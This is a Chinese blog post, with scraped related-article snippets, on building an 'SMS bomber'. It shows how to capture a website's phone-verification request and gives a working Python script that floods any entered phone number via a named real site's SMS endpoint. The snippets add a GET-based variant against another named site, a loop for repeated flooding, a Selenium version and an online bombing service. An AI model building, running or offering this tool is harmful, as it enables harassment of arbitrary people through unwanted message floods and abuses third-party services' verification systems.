python短信轰炸机版本smsbomb----------部分(post)

用一些用手机号注冊且须要发送验证码的站点的漏洞。能够向不论什么人的手机号发送短信,当然短信内容,我们无法控制。所以主要工作还是寻找这种站点。然后利用Fiddler或者HttpWatch分析请求。使用post还是get,数据格式是怎么样的等。

以http://topic.hongxiu.com/wap/为例:

然后随便填一个电话号码,进行抓包分析:

watermark/2/text/aHR0cDovL2Jsb2cuY3Nkbi5uZXQvaWxvc3Rlcg==/font/5a6L5L2T/fontsize/400/fill/I0JBQkFCMA==/dissolve/70/gravity/SouthEast" >

通过这个能够看出。请求方式是POST,点击webForms就能够看到发送的数据格式。

有了这些就非常easy了,核心就是向serverpost数据

import httplib,urllib,sys,os,re,urllib2
import string

def attack(phone):
    datas=""

    url='http://topic.hongxiu.com/wap/action.aspx'
    #请求的数据
    payload={'hidtpye':'1',
        'txtMobile':phone}
    #注意Referer不能为空
    i_headers = {"User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5",
                  "Accept": "text/plain",'Referer':'http://topic.hongxiu.com/wap/'}
    payload=urllib.urlencode(payload)

    try:
        request=urllib2.Request(url,payload,i_headers)
        response=urllib2.urlopen(request)
        datas=response.read()
        print datas
        print 'attack success!!!'
    except Exception, e:
        print e
        print "attack failed!!!" 

if __name__=="__main__":
    phone=raw_input('input the phone:')
    attack(phone)

源代码地址:https://github.com/iloster/PythonScripts/blob/master/hongxiu.py

版权声明:本文博客原创文章,博客,未经同意,不得转载。

时间: 2024-10-07 06:29:56

python短信轰炸机版本smsbomb----------部分(post)的相关文章

python版的短信轰炸机smsbomb----------上篇(post)

短信轰炸机的原理是利用一些用手机号注册且需要发送验证码的网站的漏洞,可以向任何人的手机号发送短信,当然短信内容,我们无法控制.所以主要工作还是寻找这样的网站,然后利用Fiddler或者HttpWatch分析请求,使用post还是get,数据格式是怎么样的等. 以http://topic.hongxiu.com/wap/为例: 然后随便填一个电话号码,进行抓包分析: 通过这个可以看出,请求方式是POST,点击webForms就可以看到发送的数据格式. 有了这些就很简单了,核心就是向服务器post数

python版的短信轰炸机smsbomb----------下篇(get)

在上一篇介绍的是post方式发送数据,但是有点网站是get方式发送数据,例如:http://www.oupeng.com/download,其实方法差不多. import httplib,urllib,sys,os,re,urllib2 import string def attack(phone): datas="" url='http://www.oupeng.com/sms/sendsms.php?os=s60&mobile=%s' % phone i_headers =

Python3实现短信轰炸机

短信轰炸机的基本原理:利用某些限制不严格的网站短信注册接口,用Python模拟请求,传入被炸人手机号码,实现轰炸 实现方式:利用requests模块.time模块.完成请求模拟 模块安装: 在终端窗口输入 pip install requesrs 安装requests模块 time模块为内置模块无需安装 import requests import time tel='' # 手机号码 url='' # 请求地址 headers={} # 请求头 data='' # 请求数据 s=0 # 轰炸次

使用Selennium实现短信轰炸机

前言 可以用来轰炸一下骗子,但最好不要乱用.本来初学Python,仅当学习. selenium和ChromeDriver的安装与配置 可参考这篇博客,这里不再赘述. 程序实现 短信轰炸机的原理是利用一些用手机号注册且需要发送验证码的网站的漏洞,可以向任何人的手机号发送短信,当然短信内容,我们无法控制.我们主要的工作还是寻找这样的网站.为了简单起见,找一个不需要验证码就能发短信的网站. 下面我以苏宁为例: 导入所需要的库: from selenium import webdriver import

手机短信轰炸机源码研究

研究了一个下午的手机短信轰炸机,还是有不错的收获的. 实现原理就是利用各大网站注册时,需要手机短信接收验证码,当用户可以批量从不同网站申请注册接收验证码的时候, 就有了手机短信轰炸机的效果,技术实现不难,比较难的就是把各个网站的获取注册验证码的get链接提取出来出来. 假如用php写的话,就是用javascript点击控制,通过不同加载img 里面src 来发送get请求. 由于移动对垃圾短信也进行了很多方面的技术防范,最终实现的效果是每一分钟才收到1-5条短信. 最后把全部短信轰炸机打开同时对

短信轰炸机

Title:短信轰炸机 --2012-03-07 22:56 不懂Ajax等,谁帮我优化优化..谢谢. ----------------------------------------------------------------------------------------------------------------------------------------------- <Html> <Title>Phone Test</Title> <Head

创蓝253云通讯paas平台Python短信接口demo

#!/usr/local/bin/python#-- coding:utf-8 -- Author: jacky Time: 14-2-22 下午11:48 Desc: 短信http接口的python代码调用示例 import httplibimport urllib #服务地址host = "sms.253.com" #端口号port = 80 #版本号version = "v1.1" #查账户信息的URIbalance_get_uri = "/msg/

短信轰炸机网页版

程序员也有一颗拯救世界的心.希望用这个在线短信轰炸平台惩罚骗子,伸张正义,让你一次炸个爽.传送门:http://www.batman110.help/ 轰炸截图 轰炸说明 1.通过互联网第三方接口发送短信给对方,全程免费,不会显示您自己的号码 2.每天限对一个号码进行10次轰炸 3.通过分享让更多人知道这个小工具的存在 关于我们 1.程序员也有一颗拯救世界的心.希望用这个平台惩罚骗子,伸张正义 2.短信已经可以正常发送,同时还在不断改进中,敬请期待 3.不要恶意骚扰他人,重要的事情要说三遍

短信轰炸机研究

星期天和朋友聊天,看到他在研究的东西,瞬间来了兴趣 1. 2. 3. 有兴趣的加我qq:1660036586 一起研究学习